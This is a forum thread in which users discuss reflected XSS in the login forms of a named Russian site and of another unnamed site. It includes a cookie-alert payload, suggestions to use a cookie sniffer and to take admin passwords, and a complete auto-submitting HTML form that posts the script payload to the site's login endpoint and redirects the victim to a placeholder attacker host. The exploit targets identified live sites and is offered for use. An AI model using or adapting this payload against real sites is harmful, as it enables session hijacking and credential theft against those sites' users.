well

if u try to put some string like this "><script>alert(document.cookie)</script>

on nick+login in that site



http://www.proplay.ru/

http://funkyimg.com/u/677402JPG.jpg


result:


http://funkyimg.com/u/712561JPG.jpg




Another site:

http://funkyimg.com/u/914555JPG.jpg


http://funkyimg.com/u/633204JPG.jpg


my question:


You think that can be exploitable?

Just if request method is get, because method post is invisible.

I have found many site vulnerable to xss on admin (user) login,and I think that using some cookie sniffer can be done something.


thx for your answer Mr.NOmeR1 (you are right) ;)

Even if the request method is post, you can write a PHP script to post the data, and it will be still exploitable. If I am wrong, correct me =)

you can use post (it will be better)
you can get admin's passwd ( use javascript)
sorry for my english

Even if the request method is post, you can write a PHP script to post the data, and it will be still exploitable. If I am wrong, correct me =)
You're right, but there isn't a neccessity to write php script, you can use just javascript and html ;)

http://www.proplay.ru/

- method GET not supported
- no referer-control


http://yourhost.xz/g.html - link with XSS-exploit

file g.html



<body onload='document.forms[0].submit()'>
<form method="post" action="http://www.proplay.ru/users/login/">
<input name="name" value='"><script>alert(document.cookie);document.location.href=\"http://yourhost.xz/q.html\";</script>' style="visibility:hidden;display:none">
</form>



redirect -->> q.html with any content

Another site -->> by analogy